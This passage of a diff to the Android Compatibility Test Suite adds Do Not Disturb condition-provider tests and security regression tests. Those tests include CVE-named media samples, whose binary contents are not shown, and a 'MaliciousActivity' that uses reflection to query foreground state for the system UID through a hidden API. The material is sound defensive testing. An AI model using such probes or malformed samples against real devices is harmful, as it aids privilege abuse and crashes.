+ <uses-permission android:name="android.permission.ACCESS_NOTIFICATION_POLICY" />
<uses-sdk android:minSdkVersion="24" android:targetSdkVersion="24" />
<application>
@@ -30,6 +31,24 @@
<action android:name="android.service.notification.NotificationListenerService" />
</intent-filter>
</service>
+
+ <service android:name="android.app.notification.legacy.cts.LegacyConditionProviderService"
+ android:exported="true"
+ android:label="Legacy"
+ android:permission="android.permission.BIND_CONDITION_PROVIDER_SERVICE">
+ <intent-filter>
+ <action android:name="android.service.notification.ConditionProviderService" />
+ </intent-filter>
+ </service>
+
+ <service android:name="android.app.notification.legacy.cts.SecondaryConditionProviderService"
+ android:exported="true"
+ android:label="Secondary"
+ android:permission="android.permission.BIND_CONDITION_PROVIDER_SERVICE">
+ <intent-filter>
+ <action android:name="android.service.notification.ConditionProviderService" />
+ </intent-filter>
+ </service>
</application>
<instrumentation android:name="android.support.test.runner.AndroidJUnitRunner"
diff --git a/tests/tests/notificationlegacy/src/android/app/notification/legacy/cts/ConditionProviderServiceTest.java b/tests/tests/notificationlegacy/src/android/app/notification/legacy/cts/ConditionProviderServiceTest.java
new file mode 100644
index 0000000..7a172e5
--- /dev/null
+++ b/tests/tests/notificationlegacy/src/android/app/notification/legacy/cts/ConditionProviderServiceTest.java
@@ -0,0 +1,268 @@
+/*
+ * Copyright (C) 2018 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.app.notification.legacy.cts;
+
+import static android.app.NotificationManager.INTERRUPTION_FILTER_ALARMS;
+import static android.app.NotificationManager.INTERRUPTION_FILTER_NONE;
+import static android.service.notification.NotificationListenerService.INTERRUPTION_FILTER_PRIORITY;
+
+import static junit.framework.Assert.assertEquals;
+import static junit.framework.Assert.assertNull;
+
+import android.app.ActivityManager;
+import android.app.AutomaticZenRule;
+import android.app.Instrumentation;
+import android.app.NotificationManager;
+import android.app.UiAutomation;
+import android.content.ComponentName;
+import android.content.Context;
+import android.net.Uri;
+import android.os.ParcelFileDescriptor;
+import android.support.test.InstrumentationRegistry;
+import android.support.test.runner.AndroidJUnit4;
+import android.util.ArraySet;
+import android.util.Log;
+
+import junit.framework.Assert;
+
+import org.junit.After;
+import org.junit.Before;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.io.FileInputStream;
+import java.io.IOException;
+import java.io.InputStream;
+
+@RunWith(AndroidJUnit4.class)
+public class ConditionProviderServiceTest {
+ private static String TAG = "CpsTest";
+
+ private NotificationManager mNm;
+ private ActivityManager mActivityManager;
+ private Context mContext;
+ private ArraySet<String> ids = new ArraySet<>();
+
+ @Before
+ public void setUp() throws Exception {
+ mContext = InstrumentationRegistry.getContext();
+ toggleNotificationPolicyAccess(mContext.getPackageName(),
+ InstrumentationRegistry.getInstrumentation(), true);
+ LegacyConditionProviderService.requestRebind(LegacyConditionProviderService.getId());
+ SecondaryConditionProviderService.requestRebind(SecondaryConditionProviderService.getId());
+ mNm = (NotificationManager) mContext.getSystemService(
+ Context.NOTIFICATION_SERVICE);
+ mNm.setInterruptionFilter(NotificationManager.INTERRUPTION_FILTER_ALL);
+ mActivityManager = (ActivityManager) mContext.getSystemService(Context.ACTIVITY_SERVICE);
+ }
+
+ @After
+ public void tearDown() throws Exception {
+ try {
+ for (String id : ids) {
+ if (id != null) {
+ if (!mNm.removeAutomaticZenRule(id)) {
+ throw new Exception("Could not remove rule " + id);
+ }
+
+ assertNull(mNm.getAutomaticZenRule(id));
+ }
+ }
+ } finally {
+ toggleNotificationPolicyAccess(mContext.getPackageName(),
+ InstrumentationRegistry.getInstrumentation(), false);
+ pollForConnection(LegacyConditionProviderService.class, false);
+ pollForConnection(SecondaryConditionProviderService.class, false);
+ }
+ }
+
+ @Test
+ public void testUnboundCPSMaintainsCondition_addsNewRule() throws Exception {
+ if (mActivityManager.isLowRamDevice()) {
+ return;
+ }
+
+ // make sure service get bound
+ pollForConnection(SecondaryConditionProviderService.class, true);
+
+ final ComponentName cn = SecondaryConditionProviderService.getId();
+
+ // add rule
+ addRule(cn, INTERRUPTION_FILTER_ALARMS, true);
+ pollForSubscribe(SecondaryConditionProviderService.getInstance());
+ assertEquals(INTERRUPTION_FILTER_ALARMS, mNm.getCurrentInterruptionFilter());
+
+ // unbind service
+ SecondaryConditionProviderService.getInstance().requestUnbind();
+
+ // verify that DND state doesn't change
+ assertEquals(INTERRUPTION_FILTER_ALARMS, mNm.getCurrentInterruptionFilter());
+
+ // add a new rule
+ addRule(cn, INTERRUPTION_FILTER_NONE, true);
+
+ // verify that the unbound service maintains it's DND vote
+ assertEquals(INTERRUPTION_FILTER_ALARMS, mNm.getCurrentInterruptionFilter());
+ }
+
+ @Test
+ public void testUnboundCPSMaintainsCondition_otherConditionChanges() throws Exception {
+ if (mActivityManager.isLowRamDevice()) {
+ return;
+ }
+
+ // make sure both services get bound
+ pollForConnection(LegacyConditionProviderService.class, true);
+ pollForConnection(SecondaryConditionProviderService.class, true);
+
+ // add rules for both
+ addRule(LegacyConditionProviderService.getId(), INTERRUPTION_FILTER_PRIORITY, true);
+ pollForSubscribe(LegacyConditionProviderService.getInstance());
+
+ addRule(SecondaryConditionProviderService.getId(), INTERRUPTION_FILTER_ALARMS, true);
+ pollForSubscribe(SecondaryConditionProviderService.getInstance());
+ assertEquals(INTERRUPTION_FILTER_ALARMS, mNm.getCurrentInterruptionFilter());
+
+ // unbind one of the services
+ SecondaryConditionProviderService.getInstance().requestUnbind();
+
+ // verify that DND state doesn't change
+ assertEquals(INTERRUPTION_FILTER_ALARMS, mNm.getCurrentInterruptionFilter());
+
+ // trigger a change in the bound service's condition
+ ((LegacyConditionProviderService) LegacyConditionProviderService.getInstance())
+ .toggleDND(false);
+
+ // verify that the unbound service maintains it's DND vote
+ assertEquals(INTERRUPTION_FILTER_ALARMS, mNm.getCurrentInterruptionFilter());
+ }
+
+ @Test
+ public void testUnboundCPSMaintainsCondition_otherProviderRuleChanges() throws Exception {
+ if (mActivityManager.isLowRamDevice()) {
+ return;
+ }
+
+ // make sure both services get bound
+ pollForConnection(LegacyConditionProviderService.class, true);
+ pollForConnection(SecondaryConditionProviderService.class, true);
+
+ // add rules for both
+ addRule(LegacyConditionProviderService.getId(), INTERRUPTION_FILTER_PRIORITY, true);
+ pollForSubscribe(LegacyConditionProviderService.getInstance());
+
+ addRule(SecondaryConditionProviderService.getId(), INTERRUPTION_FILTER_ALARMS, true);
+ pollForSubscribe(SecondaryConditionProviderService.getInstance());
+ assertEquals(INTERRUPTION_FILTER_ALARMS, mNm.getCurrentInterruptionFilter());
+
+ // unbind one of the services
+ SecondaryConditionProviderService.getInstance().requestUnbind();
+
+ // verify that DND state doesn't change
+ assertEquals(INTERRUPTION_FILTER_ALARMS, mNm.getCurrentInterruptionFilter());
+
+ // trigger a change in the bound service's rule
+ addRule(SecondaryConditionProviderService.getId(), INTERRUPTION_FILTER_PRIORITY, false);
+
+ // verify that the unbound service maintains it's DND vote
+ assertEquals(INTERRUPTION_FILTER_ALARMS, mNm.getCurrentInterruptionFilter());
+ }
+
+ private void addRule(ComponentName cn, int filter, boolean enabled) {
+ String id = mNm.addAutomaticZenRule(new AutomaticZenRule("name",
+ cn, Uri.EMPTY, filter, enabled));
+ Log.d(TAG, "Created rule with id " + id);
+ ids.add(id);
+ }
+
+ private void toggleNotificationPolicyAccess(String packageName,
+ Instrumentation instrumentation, boolean on) throws IOException {
+
+ String command = " cmd notification " + (on ? "allow_dnd " : "disallow_dnd ") + packageName;
+
+ runCommand(command, instrumentation);
+
+ NotificationManager nm = mContext.getSystemService(NotificationManager.class);
+ Assert.assertEquals("Notification Policy Access Grant is " +
+ nm.isNotificationPolicyAccessGranted() + " not " + on, on,
+ nm.isNotificationPolicyAccessGranted());
+ }
+
+ private void runCommand(String command, Instrumentation instrumentation) throws IOException {
+ UiAutomation uiAutomation = instrumentation.getUiAutomation();
+ // Execute command
+ try (ParcelFileDescriptor fd = uiAutomation.executeShellCommand(command)) {
+ Assert.assertNotNull("Failed to execute shell command: " + command, fd);
+ // Wait for the command to finish by reading until EOF
+ try (InputStream in = new FileInputStream(fd.getFileDescriptor())) {
+ byte[] buffer = new byte[4096];
+ while (in.read(buffer) > 0) {}
+ } catch (IOException e) {
+ throw new IOException("Could not read stdout of command: " + command, e);
+ }
+ } finally {
+ uiAutomation.destroy();
+ }
+ }
+
+ private void pollForSubscribe(PollableConditionProviderService service) throws Exception {
+ int tries = 30;
+ int delayMs = 200;
+
+ while (tries-- > 0 && !service.subscribed) {
+ try {
+ Thread.sleep(delayMs);
+ } catch (InterruptedException e) {
+ e.printStackTrace();
+ }
+ }
+
+ if (!service.subscribed) {
+ Log.d(TAG, "not subscribed");
+ throw new Exception("Service never got onSubscribe()");
+ }
+ }
+
+ private void pollForConnection(Class<? extends PollableConditionProviderService> service,
+ boolean waitForConnection) throws Exception {
+ int tries = 100;
+ int delayMs = 200;
+
+ PollableConditionProviderService instance =
+ (PollableConditionProviderService) service.getMethod("getInstance").invoke(null);
+
+ while (tries-- > 0 && (waitForConnection ? instance == null : instance != null)) {
+ try {
+ Thread.sleep(delayMs);
+ } catch (InterruptedException e) {
+ e.printStackTrace();
+ }
+ instance = (PollableConditionProviderService) service.getMethod("getInstance")
+ .invoke(null);
+ }
+
+ if (waitForConnection && instance == null) {
+ Log.d(TAG, service.getName() + " not bound");
+ throw new Exception("CPS never bound");
+ } else if (!waitForConnection && instance != null) {
+ Log.d(TAG, service.getName() + " still bound");
+ throw new Exception("CPS still bound");
+ } else {
+ Log.d(TAG, service.getName() + " has a correct bind state");
+ }
+ }
+}
diff --git a/tests/tests/notificationlegacy/src/android/app/notification/legacy/cts/LegacyConditionProviderService.java b/tests/tests/notificationlegacy/src/android/app/notification/legacy/cts/LegacyConditionProviderService.java
new file mode 100644
index 0000000..72d5d3e
--- /dev/null
+++ b/tests/tests/notificationlegacy/src/android/app/notification/legacy/cts/LegacyConditionProviderService.java
@@ -0,0 +1,49 @@
+/*
+ * Copyright (C) 2018 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+package android.app.notification.legacy.cts;
+
+import android.content.ComponentName;
+import android.service.notification.Condition;
+
+public class LegacyConditionProviderService extends PollableConditionProviderService {
+ private static PollableConditionProviderService sInstance = null;
+
+ public static ComponentName getId() {
+ return new ComponentName(LegacyConditionProviderService.class.getPackage().getName(),
+ LegacyConditionProviderService.class.getName());
+ }
+
+ public static PollableConditionProviderService getInstance() {
+ return sInstance;
+ }
+
+ @Override
+ public void onConnected() {
+ super.onConnected();
+ sInstance = this;
+ }
+
+ @Override
+ public void onDestroy() {
+ sInstance = null;
+ super.onDestroy();
+ }
+
+ public void toggleDND(boolean on) {
+ notifyCondition(
+ new Condition(conditionId, "", on ? Condition.STATE_TRUE : Condition.STATE_FALSE));
+ }
+}
diff --git a/tests/tests/notificationlegacy/src/android/app/notification/legacy/cts/LegacyNotificationManagerTest.java b/tests/tests/notificationlegacy/src/android/app/notification/legacy/cts/LegacyNotificationManagerTest.java
index 69103c8..528d66f 100644
--- a/tests/tests/notificationlegacy/src/android/app/notification/legacy/cts/LegacyNotificationManagerTest.java
+++ b/tests/tests/notificationlegacy/src/android/app/notification/legacy/cts/LegacyNotificationManagerTest.java
@@ -46,6 +46,7 @@
import junit.framework.Assert;
+import org.junit.After;
import org.junit.Before;
import org.junit.Test;
import org.junit.runner.RunWith;
@@ -79,6 +80,12 @@
mActivityManager = (ActivityManager) mContext.getSystemService(Context.ACTIVITY_SERVICE);
}
+ @After
+ public void tearDown() throws Exception {
+ toggleListenerAccess(MockNotificationListener.getId(),
+ InstrumentationRegistry.getInstrumentation(), false);
+ }
+
@Test
public void testPrePCannotToggleAlarmsAndMediaTest() throws Exception {
if (mActivityManager.isLowRamDevice()) {
diff --git a/tests/tests/notificationlegacy/src/android/app/notification/legacy/cts/PollableConditionProviderService.java b/tests/tests/notificationlegacy/src/android/app/notification/legacy/cts/PollableConditionProviderService.java
new file mode 100644
index 0000000..226c96f
--- /dev/null
+++ b/tests/tests/notificationlegacy/src/android/app/notification/legacy/cts/PollableConditionProviderService.java
@@ -0,0 +1,57 @@
+/*
+ * Copyright (C) 2018 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+package android.app.notification.legacy.cts;
+
+import android.net.Uri;
+import android.service.notification.Condition;
+import android.service.notification.ConditionProviderService;
+import android.util.Log;
+
+public abstract class PollableConditionProviderService extends ConditionProviderService {
+ final static String TAG = "CtsCps";
+
+ boolean isConnected;
+ boolean subscribed;
+ Uri conditionId;
+
+ @Override
+ public void onConnected() {
+ Log.d(TAG, getClass().getName() + " Connected");
+ isConnected = true;
+ }
+
+ @Override
+ public void onDestroy() {
+ Log.d(TAG, getClass().getName() + " Destroyed");
+ isConnected = false;
+ super.onDestroy();
+ }
+
+ @Override
+ public void onSubscribe(Uri conditionId) {
+ Log.d(TAG, getClass().getName() + " got subscribe");
+ subscribed = true;
+ this.conditionId = conditionId;
+ notifyCondition(new Condition(conditionId, "", Condition.STATE_TRUE));
+ }
+
+ @Override
+ public void onUnsubscribe(Uri conditionId) {
+ Log.d(TAG, getClass().getName() + " got unsubscribe");
+ subscribed = false;
+ this.conditionId = null;
+ }
+}
diff --git a/tests/tests/notificationlegacy/src/android/app/notification/legacy/cts/SecondaryConditionProviderService.java b/tests/tests/notificationlegacy/src/android/app/notification/legacy/cts/SecondaryConditionProviderService.java
new file mode 100644
index 0000000..2310a30
--- /dev/null
+++ b/tests/tests/notificationlegacy/src/android/app/notification/legacy/cts/SecondaryConditionProviderService.java
@@ -0,0 +1,44 @@
+/*
+ * Copyright (C) 2018 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+package android.app.notification.legacy.cts;
+
+import android.content.ComponentName;
+
+public class SecondaryConditionProviderService extends PollableConditionProviderService {
+ private static PollableConditionProviderService sInstance = null;
+
+ public static ComponentName getId() {
+ return new ComponentName(SecondaryConditionProviderService.class.getPackage().getName(),
+ SecondaryConditionProviderService.class.getName());
+ }
+
+ public static PollableConditionProviderService getInstance() {
+ return sInstance;
+ }
+
+ @Override
+ public void onConnected() {
+ super.onConnected();
+ sInstance = this;
+ }
+
+ @Override
+ public void onDestroy() {
+ sInstance = null;
+ super.onDestroy();
+ }
+
+}
diff --git a/tests/tests/packageinstaller/adminpackageinstaller/Android.mk b/tests/tests/packageinstaller/adminpackageinstaller/Android.mk
index 820708a..dd8e042 100755
--- a/tests/tests/packageinstaller/adminpackageinstaller/Android.mk
+++ b/tests/tests/packageinstaller/adminpackageinstaller/Android.mk
@@ -29,8 +29,7 @@
LOCAL_STATIC_JAVA_LIBRARIES := \
ub-uiautomator \
android-support-test \
- androidx.legacy_legacy-support-v4 \
- compatibility-device-util
+ androidx.legacy_legacy-support-v4
LOCAL_JAVA_LIBRARIES := android.test.base.stubs
diff --git a/tests/tests/packageinstaller/adminpackageinstaller/src/android/packageinstaller/admin/cts/SessionCommitBroadcastTest.java b/tests/tests/packageinstaller/adminpackageinstaller/src/android/packageinstaller/admin/cts/SessionCommitBroadcastTest.java
index 55d0c3a..17f97fe 100644
--- a/tests/tests/packageinstaller/adminpackageinstaller/src/android/packageinstaller/admin/cts/SessionCommitBroadcastTest.java
+++ b/tests/tests/packageinstaller/adminpackageinstaller/src/android/packageinstaller/admin/cts/SessionCommitBroadcastTest.java
@@ -28,8 +28,6 @@
import android.os.UserManager;
import android.text.TextUtils;
-import com.android.compatibility.common.util.CddTest;
-
import java.util.concurrent.CountDownLatch;
import java.util.concurrent.TimeUnit;
@@ -51,7 +49,6 @@
mThisAppLauncher = new ComponentName(mContext, LauncherActivity.class);
}
- @CddTest(requirement="3.2.3.4/C-0-1")
public void testBroadcastNotReceivedForDifferentLauncher() throws Exception {
if (!mHasFeature) {
return;
@@ -88,7 +85,6 @@
assertEquals(TEST_APP_PKG, info.getAppPackageName());
}
- @CddTest(requirement="3.2.3.4/C-0-1")
public void testBroadcastReceivedForNewInstall() throws Exception {
if (!mHasFeature) {
return;
@@ -111,7 +107,6 @@
setLauncher(mDefaultLauncher.flattenToString());
}
- @CddTest(requirement="3.2.3.4/C-0-1")
public void testBroadcastReceivedForEnablingApp() throws Exception {
if (!mHasFeature || !UserManager.supportsMultipleUsers()) {
return;
diff --git a/tests/tests/security/AndroidManifest.xml b/tests/tests/security/AndroidManifest.xml
index 4da499e..51d48e7 100644
--- a/tests/tests/security/AndroidManifest.xml
+++ b/tests/tests/security/AndroidManifest.xml
@@ -50,6 +50,10 @@
<category android:name="android.intent.category.FRAMEWORK_INSTRUMENTATION_TEST"/>
</intent-filter>
</activity>
+
+ <activity android:name="android.security.cts.ActivityManagerTest$NormalActivity" />
+ <activity android:name="android.security.cts.ActivityManagerTest$MaliciousActivity" />
+ <service android:name="android.security.cts.ActivityManagerTest$AppMonitoringService" />
</application>
<instrumentation android:name="android.support.test.runner.AndroidJUnitRunner"
diff --git a/tests/tests/security/AndroidTest.xml b/tests/tests/security/AndroidTest.xml
index 5482dd6..a146029 100644
--- a/tests/tests/security/AndroidTest.xml
+++ b/tests/tests/security/AndroidTest.xml
@@ -22,7 +22,7 @@
</target_preparer>
<test class="com.android.tradefed.testtype.AndroidJUnitTest" >
<option name="package" value="android.security.cts" />
- <option name="runtime-hint" value="1h8m15s" />
+ <option name="runtime-hint" value="1h40m18s" />
<!-- test-timeout unit is ms, value = 15 min -->
<option name="test-timeout" value="900000" />
<option name="hidden-api-checks" value="false" />
diff --git a/tests/tests/security/res/raw/bug_110435401.mid b/tests/tests/security/res/raw/bug_110435401.mid
new file mode 100644
index 0000000..184ab1f
--- /dev/null
+++ b/tests/tests/security/res/raw/bug_110435401.mid
Binary files differ
diff --git a/tests/tests/security/res/raw/bug_33250932_avc.mp4 b/tests/tests/security/res/raw/bug_33250932_avc.mp4
new file mode 100644
index 0000000..ff6ce03
--- /dev/null
+++ b/tests/tests/security/res/raw/bug_33250932_avc.mp4
Binary files differ
diff --git a/tests/tests/security/res/raw/bug_36592202.ogg b/tests/tests/security/res/raw/bug_36592202.ogg
new file mode 100644
index 0000000..868e630
--- /dev/null
+++ b/tests/tests/security/res/raw/bug_36592202.ogg
Binary files differ
diff --git a/tests/tests/security/res/raw/bug_37430213.mp4 b/tests/tests/security/res/raw/bug_37430213.mp4
new file mode 100644
index 0000000..618f620
--- /dev/null
+++ b/tests/tests/security/res/raw/bug_37430213.mp4
Binary files differ
diff --git a/tests/tests/security/res/raw/bug_64710074.mp4 b/tests/tests/security/res/raw/bug_64710074.mp4
new file mode 100644
index 0000000..5544ffe
--- /dev/null
+++ b/tests/tests/security/res/raw/bug_64710074.mp4
Binary files differ
diff --git a/tests/tests/security/res/raw/bug_68664359.mid b/tests/tests/security/res/raw/bug_68664359.mid
new file mode 100644
index 0000000..f816d82
--- /dev/null
+++ b/tests/tests/security/res/raw/bug_68664359.mid
@@ -0,0 +1 @@
+DK:@�~�kkkkk
\ No newline at end of file
diff --git a/tests/tests/security/res/raw/bug_70239507.aac b/tests/tests/security/res/raw/bug_70239507.aac
new file mode 100644
index 0000000..9132beb
--- /dev/null
+++ b/tests/tests/security/res/raw/bug_70239507.aac
Binary files differ
diff --git a/tests/tests/security/res/raw/bug_74114680_ts.mp4 b/tests/tests/security/res/raw/bug_74114680_ts.mp4
new file mode 100644
index 0000000..10e20bd
--- /dev/null
+++ b/tests/tests/security/res/raw/bug_74114680_ts.mp4
Binary files differ
diff --git a/tests/tests/security/res/raw/cve_2016_3756.ogg b/tests/tests/security/res/raw/cve_2016_3756.ogg
new file mode 100644
index 0000000..4f366b0
--- /dev/null
+++ b/tests/tests/security/res/raw/cve_2016_3756.ogg
Binary files differ
diff --git a/tests/tests/security/res/raw/cve_2016_3879.mp3 b/tests/tests/security/res/raw/cve_2016_3879.mp3
new file mode 100644
index 0000000..23ca4c3
--- /dev/null
+++ b/tests/tests/security/res/raw/cve_2016_3879.mp3
Binary files differ
diff --git a/tests/tests/security/res/raw/cve_2017_17773.mp4 b/tests/tests/security/res/raw/cve_2017_17773.mp4
new file mode 100644
index 0000000..09e32c9
--- /dev/null
+++ b/tests/tests/security/res/raw/cve_2017_17773.mp4
Binary files differ
diff --git a/tests/tests/security/res/raw/cve_2017_18074.wma b/tests/tests/security/res/raw/cve_2017_18074.wma
new file mode 100644
index 0000000..2634a4d
--- /dev/null
+++ b/tests/tests/security/res/raw/cve_2017_18074.wma
Binary files differ
diff --git a/tests/tests/security/res/raw/cve_2017_18155.mp4 b/tests/tests/security/res/raw/cve_2017_18155.mp4
new file mode 100644
index 0000000..5765dbb
--- /dev/null
+++ b/tests/tests/security/res/raw/cve_2017_18155.mp4
Binary files differ
diff --git a/tests/tests/security/res/raw/cve_2018_5874.mp4 b/tests/tests/security/res/raw/cve_2018_5874.mp4
new file mode 100644
index 0000000..f1656bf
--- /dev/null
+++ b/tests/tests/security/res/raw/cve_2018_5874.mp4
Binary files differ
diff --git a/tests/tests/security/res/raw/cve_2018_5875.mp4 b/tests/tests/security/res/raw/cve_2018_5875.mp4
new file mode 100644
index 0000000..c07d5d5
--- /dev/null
+++ b/tests/tests/security/res/raw/cve_2018_5875.mp4
Binary files differ
diff --git a/tests/tests/security/res/raw/cve_2018_5876.mp4 b/tests/tests/security/res/raw/cve_2018_5876.mp4
new file mode 100644
index 0000000..7f656a4
--- /dev/null
+++ b/tests/tests/security/res/raw/cve_2018_5876.mp4
Binary files differ
diff --git a/tests/tests/security/res/raw/cve_2018_5882.flac b/tests/tests/security/res/raw/cve_2018_5882.flac
new file mode 100644
index 0000000..5089aea
--- /dev/null
+++ b/tests/tests/security/res/raw/cve_2018_5882.flac
Binary files differ
diff --git a/tests/tests/security/res/raw/cve_2018_5894.mp4 b/tests/tests/security/res/raw/cve_2018_5894.mp4
new file mode 100644
index 0000000..09720c6
--- /dev/null
+++ b/tests/tests/security/res/raw/cve_2018_5894.mp4
Binary files differ
diff --git a/tests/tests/security/res/raw/cve_2018_9423.mp4 b/tests/tests/security/res/raw/cve_2018_9423.mp4
new file mode 100755
index 0000000..08e2387
--- /dev/null
+++ b/tests/tests/security/res/raw/cve_2018_9423.mp4
Binary files differ
diff --git a/tests/tests/security/src/android/security/cts/ActivityManagerTest.java b/tests/tests/security/src/android/security/cts/ActivityManagerTest.java
index 5a65d41..7e57319 100644
--- a/tests/tests/security/src/android/security/cts/ActivityManagerTest.java
+++ b/tests/tests/security/src/android/security/cts/ActivityManagerTest.java
@@ -15,18 +15,50 @@
*/
package android.security.cts;
+import android.annotation.Nullable;
+import android.app.Activity;
+import android.app.ActivityManager;
+import android.app.Service;
+import android.content.Context;
+import android.content.Intent;
+import android.os.Bundle;
+import android.os.Handler;
import android.os.IBinder;
+import android.os.Process;
import android.platform.test.annotations.SecurityTest;
+import android.support.test.InstrumentationRegistry;
+import android.util.Log;
+import android.view.WindowManager;
+
import junit.framework.TestCase;
+import java.lang.reflect.Field;
+import java.lang.reflect.Method;
+import java.util.concurrent.CountDownLatch;
+import java.util.concurrent.TimeUnit;
+
@SecurityTest
public class ActivityManagerTest extends TestCase {
+ private static final String SECURITY_CTS_PACKAGE_NAME = "android.security.cts";
+ private static CountDownLatch sLatch;
+ private static volatile int sNormalActivityUserId;
+ private static volatile boolean sCannotReflect;
+ private static volatile boolean sIsAppForeground;
+
+ private static final String TAG = "ActivityManagerTest";
+
@Override
protected void setUp() throws Exception {
super.setUp();
+
+ sLatch = new CountDownLatch(2);
+ sNormalActivityUserId = -1;
+ sCannotReflect = false;
+ sIsAppForeground = false;
}
+ @SecurityTest(minPatchLevel = "2015-03")
public void testActivityManager_injectInputEvents() throws ClassNotFoundException {
try {
/*
@@ -42,4 +74,117 @@
// Patched devices should throw this exception
}
}
+
+ public void testIsAppInForegroundNormal() throws Exception {
+ /* Verify that isAppForeground can be called by the caller on itself. */
+ launchActivity(NormalActivity.class);
+ sNormalActivityUserId = InstrumentationRegistry.getTargetContext().getPackageManager()
+ .getPackageUid(SECURITY_CTS_PACKAGE_NAME, 0);
+ sLatch.await(5, TimeUnit.SECONDS); // Ensure the service has ran at least twice.
+ if (sCannotReflect) return; // If reflection is not possible, pass the test.
+ assertTrue("isAppForeground failed to query for uid on itself.", sIsAppForeground);
+ }
+
+ public void testIsAppInForegroundMalicious() throws Exception {
+ /* Verify that isAppForeground cannot be called by another app on a known uid. */
+ launchActivity(MaliciousActivity.class);
+ launchSettingsActivity();
+ sLatch.await(5, TimeUnit.SECONDS); // Ensure the service has ran at least twice.
+ if (sCannotReflect) return; // If reflection is not possible, pass the test.
+ assertFalse("isAppForeground successfully queried for a uid other than itself.",
+ sIsAppForeground);
+ }
+
+ private void launchActivity(Class<? extends Activity> clazz) {
+ final Context context = InstrumentationRegistry.getInstrumentation().getContext();
+ final Intent intent = new Intent(Intent.ACTION_MAIN);
+ intent.setClassName(SECURITY_CTS_PACKAGE_NAME, clazz.getName());
+ intent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
+ context.startActivity(intent);
+ }
+
+ private void launchSettingsActivity() {
+ final Context context = InstrumentationRegistry.getInstrumentation().getContext();
+ final Intent intent = new Intent(android.provider.Settings.ACTION_SETTINGS);
+ intent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
+ context.startActivity(intent);
+ }
+
+ public static class NormalActivity extends Activity {
+
+ @Override
+ protected void onCreate(@Nullable Bundle savedInstanceState) {
+ super.onCreate(savedInstanceState);
+ getWindow().addFlags(WindowManager.LayoutParams.FLAG_KEEP_SCREEN_ON);
+
+ Intent intent = new Intent(this, AppMonitoringService.class);
+ intent.putExtra(AppMonitoringService.EXTRA_UID, sNormalActivityUserId);
+ startService(intent);
+ }
+ }
+
+ public static class MaliciousActivity extends Activity {
+
+ @Override
+ protected void onCreate(@Nullable Bundle savedInstanceState) {
+ super.onCreate(savedInstanceState);
+ getWindow().addFlags(WindowManager.LayoutParams.FLAG_KEEP_SCREEN_ON);
+
+ Intent intent = new Intent(this, AppMonitoringService.class);
+ intent.putExtra(AppMonitoringService.EXTRA_UID, Process.SYSTEM_UID);
+ startService(intent);
+ finish();
+ }
+ }
+
+ public static class AppMonitoringService extends Service {
+
+ private static final String EXTRA_UID = "android.security.cts.extra.UID";
+ private int uid;
+
+ @Override
+ public int onStartCommand(Intent intent, int flags, int startId) {
+ uid = intent.getIntExtra(EXTRA_UID, -1);
+ return super.onStartCommand(intent, flags, startId);
+ }
+
+ public AppMonitoringService() {
+ super.onCreate();
+
+ final Handler handler = new Handler();
+ handler.postDelayed(new Runnable() {
+ public void run() {
+ try {
+ ActivityManager activityManager = (ActivityManager) getSystemService(
+ ACTIVITY_SERVICE);
+ Field field = activityManager.getClass().getDeclaredField(
+ "IActivityManagerSingleton");
+ field.setAccessible(true);
+ Object fieldValue = field.get(activityManager);
+ Method method = fieldValue.getClass().getDeclaredMethod("create");
+ method.setAccessible(true);
+ Object IActivityInstance = method.invoke(fieldValue);
+ Method isAppForeground = IActivityInstance.getClass().getDeclaredMethod(
+ "isAppForeground", int.class);
+ isAppForeground.setAccessible(true);
+ boolean res = (boolean) isAppForeground.invoke(IActivityInstance, uid);
+ if (res) {
+ sIsAppForeground = true;
+ }
+ } catch (Exception e) {
+ Log.e(TAG, "Failed to fetch/invoke field/method via reflection.", e);
+ sCannotReflect = true;
+ }
+ sLatch.countDown();
+ handler.postDelayed(this, 200);
+
+ }
+ }, 0);
+ }
+
+ @Override
+ public IBinder onBind(Intent intent) {
+ throw new UnsupportedOperationException("Not yet implemented");
+ }
+ }
}
\ No newline at end of file
diff --git a/tests/tests/security/src/android/security/cts/AllocatePixelRefIntOverflowTest.java b/tests/tests/security/src/android/security/cts/AllocatePixelRefIntOverflowTest.java
index f8a2a8f..df1018a 100644
--- a/tests/tests/security/src/android/security/cts/AllocatePixelRefIntOverflowTest.java
+++ b/tests/tests/security/src/android/security/cts/AllocatePixelRefIntOverflowTest.java
@@ -32,6 +32,7 @@
* Verifies that the device is not vulnerable to ANDROID-19270126: Android
* BitmapFactory.decodeStream JPG allocPixelRef integer overflow
*/
+ @SecurityTest(minPatchLevel = "2015-03")
public void testAllocateJavaPixelRefIntOverflow() {
